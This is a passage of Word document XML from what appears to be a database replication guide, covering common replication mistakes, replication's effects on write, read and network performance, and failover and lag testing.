    <w:p w14:paraId="7B08E6D2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1542"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Lag grows silently for hours (due to long-running query blocking replay).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8C0F1C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1542"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Failover occurs → hours of data lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C72B9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1542"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Users see stale data with no awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5339FCF8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Alert if lag &gt; threshold (1 second for critical systems, 30 seconds for non-critical).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AAA728" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.3 Synchronous Replication Across High-Latency Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DBAD68" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mistake:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> synchronous_commit = on with a cross-region replica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61983CA1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285AE221" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write latency: local_write (1ms) + cross_region_RTT (150ms) = 151ms PER WRITE!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1C635" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>At 1000 writes/sec: effectively impossible (each write blocks for 150ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763DBE43" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Synchronous within region (1–2ms), asynchronous across regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8F678" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.4 No Replication Slot / GTID Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D42341" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mistake (PostgreSQL):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Not using replication slots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705916EE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D189A5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A490C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Replica disconnects for 30 minutes (network issue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF11D7C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary generates 500MB of WAL during that time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F050CDD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary's wal_keep_segments is set too low → old WAL segments deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB6CED" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Replica reconnects → needs WAL that was deleted → MUST REBUILD FROM SCRATCH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E96A4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Rebuilding a 500GB replica takes hours. With a replication slot, primary retains needed WAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7285E38C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.5 Treating Replication as Backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15776720" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mistake:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> "We have replicas, so we don't need backups."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBF471" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D6745" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1543"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>DROP TABLE is replicated instantly to all replicas → data gone everywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628FA233" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1543"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Logical corruption (bug writes bad data) is replicated faithfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E5A17" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1543"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Ransomware encrypts primary → replicated to replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2FCD8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication protects against:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> hardware failure, node crashes, disk failures. </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication does NOT protect against:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> logical errors, accidental deletes, corruption, ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0AD829" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always maintain:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> PITR-capable backups (base backup + continuous WAL archiving) SEPARATELY from replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D139A1A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="1AC47096">
          <v:rect id="_x0000_i5654" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B9EEE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Performance Implications of Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDCCEE0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 Write Performance Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF94CF9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600AF859" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>No replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE64CF8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write = local disk write (1ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61238961" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="2B5A2C6D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Async replication (1 replica):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D671170" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write = local disk write (1ms) + async WAL send (0ms — non-blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3614C63D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Negligible overhead on primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605CFC0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="37FFDE6E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Sync replication (1 replica, same AZ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04E817" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write = local disk write (1ms) + network RTT + replica disk write (2–3ms total)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48BB28" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  2–3x slower writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A40D0A8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="2391C926" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Sync replication (1 replica, cross-region):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE840F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write = local disk write (1ms) + 100ms network + replica disk write (101ms total)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357CF157" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  100x slower writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154371CC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Read Performance Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577154C2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CD726A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Without replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB217A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  All reads hit primary (limited capacity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D301E6A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary handles reads + writes → contention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B7ADD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="75752628" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>With 3 read replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A45BD60" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  75% of reads offloaded from primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507ED4A1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary has more capacity for writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB00CA4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Reads from replica: same latency as primary (assuming data in buffer pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1B57C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC41F3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Bonus: replicas can have different indexes optimized for specific read patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397AA9F8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.3 Network Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D76CC1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307403E7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write rate: 5000 rows/sec × 500 bytes/row = 2.5 MB/s of WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC67BF3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>3 replicas: 2.5 MB/s × 3 = 7.5 MB/s outbound from primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728DFA9B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="4BD40AB6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>At scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ABD271" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  50,000 rows/sec × 500 bytes = 25 MB/s of WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB50939" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  3 replicas = 75 MB/s = 600 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2FB730" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  This becomes a meaningful fraction of a 1 Gbps NIC!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57935A11" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="7D1FED40">
          <v:rect id="_x0000_i5655" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF32FC4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Testing Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C5A20" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.1 What to Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339A7B5B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failover testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B241B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Kill the primary process. Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724F5AD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Automatic failover occurs within expected RTO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1CDD5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>New primary accepts writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A723202" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Clients reconnect to new primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F53119" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>No data loss (for sync replication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6952AA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Network partition between primary and replicas. Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699521A4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>No split-brain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19388146" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Old primary stops accepting writes (fenced).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C4151A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>System recovers when partition heals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A428A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lag testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F877589" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1545"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Generate heavy write load. Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4D498" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1545"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica lag stays bounded (doesn't grow unboundedly).</w:t>
      </w:r>
    </w:p>
